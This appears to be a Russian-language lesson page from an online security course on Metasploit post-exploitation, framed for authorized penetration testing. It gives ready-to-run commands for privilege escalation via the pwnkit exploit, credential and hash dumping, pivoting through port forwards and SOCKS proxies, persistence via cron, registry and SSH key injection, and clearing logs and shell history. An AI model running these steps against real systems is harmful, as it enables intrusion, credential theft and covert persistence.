Постэксплуатация: перемещение и закрепление
Используйте постэксплуатационные модули Metasploit для повышения привилегий, извлечения учётных данных и закрепления.
«Постэксплуатация: перемещение и закрепление» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 4 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.
Цели постэксплуатации
После получения первоначального доступа цели атакующего таковы: повысить привилегии, собрать сведения, сохранить постоянный доступ и перемещаться по сети, чтобы достичь истинной цели (данных, систем или контроля домена).
Ситуационная осведомлённость
Первые действия после получения оболочки: поймите, где вы находитесь. Соберите сведения о системе и конфигурации сети, текущих привилегиях пользователя, запущенных процессах и переменных среды.
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/linux/gather/enum_systemПовышение привилегий
Локальное повышение привилегий переводит оболочку с низкими привилегиями к правам суперпользователя или SYSTEM. local_exploit_suggester в Metasploit определяет подходящие эксплойты ядра и локальные эксплойты на основе версии OS цели.
meterpreter > run post/multi/recon/local_exploit_suggester
# Identifies applicable exploits
# Then:
msf6 > use exploit/linux/local/cve_2021_4034_pwnkit
msf6 > set SESSION 1
msf6 > runСбор учётных данных
Собирайте учётные данные: хешированные пароли, учётные данные в открытом виде в конфигурационных файлах, сохранённые пароли браузеров и ключи SSH. Они обеспечивают боковое перемещение и сохранение доступа.
meterpreter > run post/linux/gather/hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/multi/gather/ssh_creds
# Check env vars for cleartext creds:
meterpreter > run post/multi/gather/envПеремещение через промежуточный узел: перенаправление портов
Перемещение через промежуточный узел использует скомпрометированный узел как мост для доступа к изолированным внутренним сетям. portfwd в Metasploit создаёт локальные перенаправления портов через сеанс Meterpreter.
# Forward local port 3306 to internal DB
meterpreter > portfwd add -l 3306 -p 3306 -r 10.10.10.20
# Now connect locally:
mysql -h 127.0.0.1 -P 3306 -u rootМаршрутизация через сеансы
Модуль маршрутизации Metasploit добавляет сетевые маршруты через сеанс, позволяя другим модулям обращаться к сетям, доступным только через узел-посредник.
msf6 > route add 10.10.10.0/24 1 # route via session 1
msf6 > route print
# Now run modules targeting 10.10.10.x
# through session 1 as pivotПеремещение через прокси SOCKS
Прокси SOCKS через Metasploit (или chisel/ssh -D) позволяет направлять произвольные инструменты через узел-посредник с помощью proxychains, благодаря чему nmap, curl и браузеры могут обращаться к внутренним сетям.
# Set up SOCKS proxy through session
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > run -j
# Route tools through proxy
proxychains nmap -sT 10.10.10.0/24Механизмы сохранения доступа
Сохранение доступа обеспечивает его восстановление после перезагрузок и потери сеанса. Распространённые методы: задания cron (Linux), ключи запуска в реестре (Windows), внедрение ключей в authorized_keys SSH и установка служб.
# Linux: cron-based persistence
meterpreter > run post/linux/manage/cron_persistence
# Windows: registry
meterpreter > run post/windows/manage/persistence_exe
# SSH key injection
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keysСокрытие следов
Атакующие очищают журналы, чтобы сохранять незаметность. Важное замечание для безопасности: современные решения SIEM и EDR передают журналы на внешние узлы в реальном времени — очистка локальных журналов не удаляет централизованные записи.
meterpreter > clearev # clear Windows event logs
# Linux: clear bash history
unset HISTFILE
cat /dev/null > ~/.bash_historyМодули постэксплуатации
Metasploit включает сотни модулей постэксплуатации для Windows и Linux: сбор учётных данных, получение данных браузеров, перехват нажатий клавиш, создание снимков экрана и сбор сведений о сети.
msf6 > use post/windows/gather/enum_logged_on_users
msf6 > use post/multi/gather/browser_history
msf6 > use post/windows/gather/screen_spy
msf6 > set SESSION 1
msf6 > runКогда нужно остановиться
В рамках санкционированных тестов на проникновение остановитесь, когда достигнете цели, согласованной в рамках работ, или столкнётесь с данными, к которым у вас нет разрешения на доступ. Тщательно документируйте свой путь — именно эту цепочку атаки вы представляете в отчёте.
Быстрая проверка
Что позволяет выполнить команда Metasploit «route add»?
Итоги: постэксплуатация
Постэксплуатация развивает первоначальный доступ, чтобы добиться реального воздействия: повысить привилегии, собрать учётные данные, перемещаться по сети и сохранить доступ. Metasploit предоставляет модули постэксплуатации для каждого этапа. Документируйте каждый шаг — цепочка атаки от проникновения до цели является основным результатом тестирования на проникновение.
Часто задаваемые вопросы
Урок «Постэксплуатация: перемещение и закрепление» бесплатный?
Да — полный текст урока «Постэксплуатация: перемещение и закрепление» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.
Чему я научусь в уроке «Постэксплуатация: перемещение и закрепление»?
Используйте постэксплуатационные модули Metasploit для повышения привилегий, извлечения учётных данных и закрепления. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.
Нужен ли мне опыт, чтобы начать Cyber Security Academy?
Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 4 из 4.
Сколько времени занимает урок «Постэксплуатация: перемещение и закрепление»?
Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.
Можно ли писать и запускать код в этом уроке Cyber Security Academy?
Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.
Все уроки этого курса
- Архитектура Metasploit и msfconsole
- Эксплуатация известной уязвимости
- Полезные нагрузки: поэтапные и цельные, Meterpreter
- Постэксплуатация: перемещение и закрепление